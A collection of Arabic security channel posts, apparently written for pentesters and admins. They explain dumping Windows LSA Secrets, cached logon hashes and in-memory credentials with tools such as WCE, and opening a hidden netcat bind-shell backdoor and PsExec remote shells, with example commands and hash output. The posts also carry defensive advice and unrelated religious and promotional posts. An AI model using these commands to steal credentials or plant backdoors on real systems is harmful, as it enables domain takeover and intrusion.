تخيل معايا: فيه سيرفر Standalone بيشغّل خدمة SQL Server، والخدمة دي بتشتغل باستخدام حساب Domain User. لو السيرفر عليه باسورد محلي فاضي (Local Admin بدون باسورد)، تقدر بسهولة تطلع الباسورد من LSA Secrets.
والأخطر؟ لو نفس الخدمة دي شغالة على سيرفر تاني في دومين تاني (Master Domain)، تقدر تسحب الحساب وتستخدمه في اختراق دومين مختلف تمامًا. كل ده بدأ من سيرفر مالوش دعوة، بس بيشغّل خدمة واحدة بحساب دوميني.
‼️ أدوات استخراج LSA Secrets 🛠
💉 LSADump2
أشهر أداة ظهرت زمان، استخدمت تقنية DLL Injection عشان تدخل نفسها في عملية LSASS وتسحب البيانات. الأدمن كان بيشغّلها كده:
C:\>lsadump2
وكانت بتطلعلك بيانات بالشكل ده:
_SC_MSSQLServer
p.a.s.s.w.o.r.d.
_SC_SQLServerAgent
p.a.s.s.w.o.r.d.
يعني باختصار: باسوردات SQL Services كانت بتتخزن بنصها الصريح (plaintext) داخل الريجيستري.
لكن من Windows XP وطالع، مايكروسوفت غيرت شوية حاجات، وخلّت الأداة دي ماتشتغلش إلا لو بتشتغل تحت حساب SYSTEM.
‼️ Cain & Abel
أداة شاملة بتشتغل كـ GUI، وفيها ميزة استخراج LSA Secrets حتى على الأنظمة الحديثة، بشرط تكون مشغلها كأدمن. كمان بتقدر تسحب بيانات من:
🔸 Protected Storage
🔸 Internet Explorer
🔸 Credential Manager
🔸 SQL Enterprise Manager
الشبكات اللاسلكية 🔸
🔸 Windows Mail
🔸 (Dial-Up)
📦 Gsecdump
أداة من Truesec، بتشتغل على أنظمة Windows من 2000 لحد 2008 (x86 و x64)، وتقدر تسحب:
🔸LSA Secrets
🔸 Password hashes
🔸 Cached logon data
🔸Logon Cache – لما ويندوز يفتكر اللي دخل قبلك 🙈
بشكل افتراضي، Windows بيخزن بيانات آخر 10 مستخدمين عملوا تسجيل دخول. ليه؟ علشان لو مفيش اتصال بالدومين، المستخدم يقدر يدخل.
المكان اللي بتتخزن فيه البيانات دي:
HKLM\SECURITY\CACHE\NL$n
(n = رقم من 1 لـ 10)
المشكلة؟ البيانات دي متشفّرة، والهاشات مش بس NTLM، لأ كمان مشفّرة بمفتاح خاص بالجهاز نفسه. بس ده مابيوقفش الأدوات الصح.
🧰 CacheDump و Cain
🔸 CacheDump: أداة بتسحب هاشات المستخدمين المخزنة.
🔸 Cain: فيها ميزة MS-Cache Hashes تقدر تسحب الهواش دي بسهولة، لو بتشغّلها كأدمن.
الهواش دي لازم تتفك باستخدام أدوات الكسر، أو يتم استخدامها مباشرة لو لقيتها محفوظة في الذاكرة (زي ما بيعمل WCE).
مايكروسوفت بتقول إن دي صلاحيات "by design"، يعني متوقعة من أي أدمن. لكن ده مش معناه نسكت!
أهم خطوات الحماية:
🔸 قلل صلاحيات الأدمن قد ما تقدر.
🔸 بلاش تشغّل خدمات بحسابات فيها صلاحيات دومين عالية.
🔸 استخدم حسابات مخصصة للخدمات بصلاحيات محدودة جدًا.
غيّر إعداد Cache للوجينز في الريجيستري:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount
الافتراضي 10، بس تقدر تخليه:
🔸 0 ← أقصى حماية (بس هيمنع دخول الأجهزة المحمولة بدون اتصال بالدومين).
🔸 1 ← حل وسط جيد.
‼️ الخلاصة
نظام Windows مش بس بيخبّي الباسوردات في ملفات مشهورة زي SAM أو NTDS، لأ ده بيخبّيها في الريجيستري، في الكاش، وفي خدمات تانية. وأي مهاجم شاطر – أو حتى مبتدئ بأداة جاهزة – يقدر يطلعها لو خد صلاحيات كفاية.
أدوات زي LSADump2، Cain & Abel، وGsecdump مش بتكسر النظام، هي بس بتستغل إن النظام ماكانش مأمّن كويس.
الرد مش إنك تمنع الأدوات دي، الرد الصح هو: ما تخليش حد يبقى أدمن أصلاً!
‼️ تفريغ الـ Hash اللي متخزنة في الرام
فاكر لما اتكلمنا قبل كده عن أدوات زي pwdump وCacheDump؟ الأدوات دي ليها حدود، ومش بتقدر توصل لكل أنواع البيانات اللي متخزنة في الذاكرة (الرام) وقت ما المستخدم بيسجّل دخوله. هنا بقى بييجي دور أداة جامدة اسمها WCE - Windows Credentials Editor، واللي معمولة عن طريق Amplia Security. الأداة دي بتقدر تطلعلك الـ credentials (زي اسم المستخدم والدومين والـ hash بتاع الباسورد) اللي متخزنة مؤقتًا في الرام لما حد يعمل تسجيل دخول تفاعلي، سواء كان محلي أو عن بُعد باستخدام RDP.
ليه Windows بيخزن الحاجات دي أصلاً؟ ببساطة علشان يسهّل ميزة الـ Single Sign-On، يعني تدخل مرة واحدة على الجهاز وتبقى قادر توصل لباقي الـ network resources من غير ما تدخل الباسورد كل شوية.
والكارثة؟ أيوه، الكارثة إن في بعض الحالات البيانات دي بتفضل متخزنة في الرام حتى بعد ما المستخدم يقفل الجلسة بتاعته!
‼️ السيناريو اللي بيحصل
تخيل معايا إن فيه أدمن عامل RDP على سيرفر احتياطي في الشبكة علشان يعمل شوية مهام إدارية. لو الهاكرز قدروا يوصلوا للسيرفر ده، يقدروا يشفطوا credentials بتاعت الأدمن من الرام، حتى لو السيرفر ده مش هو الـ Domain Controller (DC) نفسه!
وده مش سيناريو خيالي، ده بيحصل كتير للأسف. الأجهزة الاحتياطية دي أوقات كتير بتكون حمايتها أضعف من الـ DC، وده بيخليها هدف سهل. ومن اللحظة اللي هياخد فيها الهاكر الـ hash بتاع الأدمن، يقدر يسيطر على الدومين كله من غير ما يلمس الـ DC نفسه.
‼️ مثال عملي على استخدام WCE
هنا في المثال ده، بنشوف أداة WCE وهي بتطلع الـ hashes من الرام على جهاز Windows 7:
D:\Tools\wce>wce
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security
- by Hernan Ochoa (hernan@ampliasecurity.com) Use -h for help.
he7user:win7box:94C462E63EEBD15C1FA73AE7450B0033:BD8131884D042EC6D76699F276930057
service1:win7box:2DD906EC5A2312914ED11CB6AC8C08BA:F50497165BD0705CAABE6218E9A51E34
customuser:win7box:5C84378540D3A964AAD3B435B51404EE:2972E68B746AD0F3C78A64157540F427
النتيجة دي بتورينا إن الأداة قدرت تجيب الـ hashes بتاعة المستخدمين اللي كانوا شغالين على الجهاز، سواء كانت LM hash أو NTLM hash. والملفت هنا، إن حتى لو نظام التشغيل مش بيخزن LM hashes افتراضيًا، ساعات WCE بتقدر تطلعها برضو.
المميز بقى؟ إن WCE في معظم الحالات بتعمل كده من غير ما تحقن كود في أي عملية، يعني مش بتكسر النظام أو تسبب كراش، وده ميزة كبيرة لو انت بتشتغل كـ penetration tester وعايز تخلّي النظام واقف على رجليه بعد الاختبار.
طب نمنع الكلام ده إزاي؟
بص، مفيش طلقة سحرية هنا. الأدوات دي بتشتغل بعد ما الهاكر بيكون وصل لامتيازات الأدمن، فحتى لو فيه برامج حماية شغالة على الجهاز زي الـ Antivirus أو الـ IPS، فيه احتمالية إنها تتعدى عليهم.
عشان كده، لازم ناخد شوية إجراءات:
🔸 خليك دايمًا محدّث أجهزة الشبكة، حتى اللي باين إنها مش مهمة.
🔸 بلاش الأدمن يدخل بـ RDP على أي جهاز مش واثق منه 100%.
🔸 متديش صلاحيات أدمن لمستخدمين في الدومين على أجهزة عشوائية.
🔸 حتى لو استخدمت Kerberos بدل NTLM، المشكلة لسه موجودة لأن Windows بيخزن برضو الـ NTLM hash في الرام.
‼️ التحكم عن بُعد وفتح أبواب خلفية
بعد ما الهاكر يوصل لامتياز الأدمن ويسحب الـ passwords، غالبًا بيبدأ يظبط وضعه ويسيطر على الجهاز بالكامل. بيبدأ يزرع خدمات أو أدوات تخليه يقدر يدخل من بره في أي وقت، ودي بنسميها Backdoors، وغالبًا بتكون مخفية باستخدام تقنيات متقدمة (هنتكلم عنها قدام).
‼️ خاتمة
لو انت فاكر إن اختراق الدومين لازم يعدي على الـ Domain Controller، فـ للأسف لأ، الموضوع أوقات بيبدأ من جهاز باك أب نايم في الشبكة. الـ Hashes بتتخزن في الرام، وبتفضل هناك حتى بعد انتهاء الجلسة، وده بيخلي أي جهاز فيه جلسة RDP سابقة هدف ذهبي. والأدوات زي WCE بتسهّل الشغل جدًا لأي مهاجم وصل للمرحلة دي.
الموضوع كله بيعتمد على إنك تمنع الوصول الإداري غير المبرر، وتراقب الشبكة كويس، وتفكر مرتين قبل ما تدخل RDP على أي جهاز.
لو عايز تبقى أدمن شاطر، خليك دايمًا شايف أبعد من الماوس والكيبورد… الرام فيها بلاوي!
كَانَ ﷺ رقيقُ القَلب، حَسنُ العِشرَة، يَترفَّق بأصحَابِه، ولا يُهينُ أحَدَاً، مَن رآهُ هَابهُ، وَمَن عرفهُ أحبَّـه، يألفُ النَّاس وَيألفونَهُ، لا يَنطقُ بفُحشٍ وَلا يَعيبُ على أحدٍ، ولا يَعيبُ حَتَّى طَعامَـاً، ليّنُ الجَانب، لا يرُدُّ سَائلاً، وَليسَ بِفَظٍ وَلا غَليظ ﷺ
صلوا عليه وسلموا تسليما ﷺ .. ♥️
🥰1
‼️ أدوات التحكم عن بُعد من خلال الكوماند لاين
فيه طريقة سهلة جدًا علشان تعمل باك دور (Backdoor) وتتحكم في جهاز عن بُعد، وده من خلال أداة بسيطة لكن قوية اسمها netcat. دي أداة الناس بتسميها "السكين السويسري بتاع TCP/IP" لإنها بتعمل حاجات كتير جدًا بتخليك تفتح اتصال بين جهازين وتنفذ أوامر أو تنقل بيانات كأنك قاعد على الجهاز التاني.
الفكرة هنا إنك بتخلي netcat تشتغل كـ "listener"، يعني تفضل قاعدة مستنية أي اتصال على بورت معين، ولما حد يتصل، تقوم مشغّلة برنامج معين، وليكن مثلًا الـ cmd.exe (اللي هو سطر الأوامر بتاع ويندوز). وده معناه إنك تقدر ترجع شل (Shell) للجهاز بتاعك كأنك فتحت ترمينال على الضحية.
الكود اللي بيعمل كده شكله كالتالي:
C:\TEMP\NC11Windows>nc –L –d –e cmd.exe –p 8080
🔸 -L: ده بيخلي الـ listener يفضل شغّال حتى لو الاتصال اتقطع.
🔸 -d: ده بيشغّل netcat في وضع التخفي، يعني من غير ما يظهر أي حاجة على الشاشة.
🔸 -e: ده اللي بيقول لـ netcat يشغّل إيه لما الاتصال ييجي، وهنا إحنا قلنا له يشغّل cmd.exe.
🔸 -p: وده البورت اللي هيسمع عليه، في المثال ده هو 8080.
بمجرد ما حد يتصل على البورت ده، بياخد شل على الجهاز اللي شغّال عليه netcat. كأنك فتحت الباب من غير ما حد يحس، ودخلت من غير استئذان.
طيب إيه اللي بيحصل بعد كده؟ جهاز تاني (الهاكر مثلًا) ممكن ببساطة يكتب:
D:\> nc 192.168.202.44 8080
وده معناه إنه بيتصل بالجهاز الضحية اللي الـ IP بتاعه 192.168.202.44 على البورت 8080. فجأة يلاقي نفسه جوه سطر الأوامر بتاع الضحية وبيكتب أوامر براحتك بقى:
C:\TEMP\NC11Windows>ipconfig
ويشوف الـ IP بتاعه، الـ Gateway، وكل التفاصيل التانية.
وفي الآخر، ممكن بكل بساطة يكتب:
exit
ويخرج من الاتصال وكأن ماحصلش حاجة.
الحلو هنا إنك مش بس بتفتح شل، لأ، أنت عندك تحكم كامل، تقدر تشغّل ملفات، تنفّذ أوامر، وحتى تمسح حاجات لو عايز. وده بيعتمد تمامًا على إنت ممكن تتفنن في استخدام الكونسول بتاع ويندوز قد إيه.
بس فيه نقطة: لو أنت تقدر توصل للـ SMB (يعني بورتات 139 أو 445)، فـ فيه أداة أقوى بكتير اسمها PsExec. دي أداة من Microsoft Sysinternals، وبتخليك تشغّل أوامر على جهاز تاني من غير ما تنقل ملفات أو تفتح شل يدوي.
الأمر بتاعها بسيط جدًا:
C:\>psexec \\10.1.1.1 -u Administrator -p password -s cmd.exe
يعني: شغّل cmd.exe على جهاز IP بتاعه 10.1.1.1 باستخدام اسم مستخدم وباسورد الأدمن. خلاص كده، بقى عندك سطر أوامر هناك.
فيه زمان كنا بنستخدم أمر AT عشان نعمل Scheduling لتشغيل أوامر على جهاز تاني، بس PsExec خلّى الموضوع تافه جدًا وسهل.
وطبعًا مينفعش ننسى Metasploit Framework. ده بقى وحش، فيه أدوات كتير جدًا تقدر تفتحلك شل، تربطك ببورت معين، تشغّل أوامر، أو حتى تربط جهاز الضحية بجهازك كأنك بتسحب له الخط. وكمان عندهم حاجات ActiveX بتشتغل من خلال Internet Explorer من غير ما الضحية يحس بحاجة.
يعني في عالم الريموت كونترول، سواء Netcat أو PsExec أو Metasploit، كلهم بيدوك مفاتيح سحرية تفتح بيها أجهزة الناس لو عندك صلاحيات أو قدرت تزرع الباك دور.
‼️ الخاتمة
لو أنت بتلعب في المنطقة دي (سواء للتعليم، للاختبار، أو حتى لحماية الأنظمة)، لازم تبقى عارف الأدوات دي كويس، لأن هي دي اللي ممكن حد يستخدمها ضدك، أو ممكن تستخدمها كأدمن علشان تفهم خصومك. استخدم كل حاجة بمسؤولية، وفكّر دايمًا في إن القوة دي زيها زي السكينة… ممكن تطبخ بيها، وممكن تجرح بيها.
ولو netcat هو السكين السويسري، فـ PsExec هو مفك الكهرباء… وساعات بتحتاج الاتنين.
نصيحة عند عملية استكشاف الإنترنت أو شبكة معينة بشكل منهجي لجمع المعلومات.
أثناء فحصك لأي تطبيق، احرص دائمًا على استخدام رأسي User-Agent مختلفين (واحد للكمبيوتر وآخر للجوال) ولاحظ أي اختلاف يطرأ على الاستجابة. 👀
لأن الكثير من التطبيقات لديها نُسخ متعددة تعمل على منصات مختلفة، وهذه النسخ قد تختلف في الميزات، أو نقاط الوصول (Endpoints)، أو حتى طرق التحقق من الهوية (Authentication).
أثناء فحصك لأي تطبيق، احرص دائمًا على استخدام رأسي User-Agent مختلفين (واحد للكمبيوتر وآخر للجوال) ولاحظ أي اختلاف يطرأ على الاستجابة. 👀
لأن الكثير من التطبيقات لديها نُسخ متعددة تعمل على منصات مختلفة، وهذه النسخ قد تختلف في الميزات، أو نقاط الوصول (Endpoints)، أو حتى طرق التحقق من الهوية (Authentication).
When crawling your target, always crawl with 2 separate user-agent headers, one for desktop and one for mobile devices and look for response changes! 👀
Some applications deploy multiple versions for different platforms, often containing different features, endpoints, or even authentication mechanisms!
👌1
تحقق من أداة الذكاء الاصطناعي هذه على Instagram! https://aistudio.instagram.com/ai/2458514961193150?utm_source=ai_agent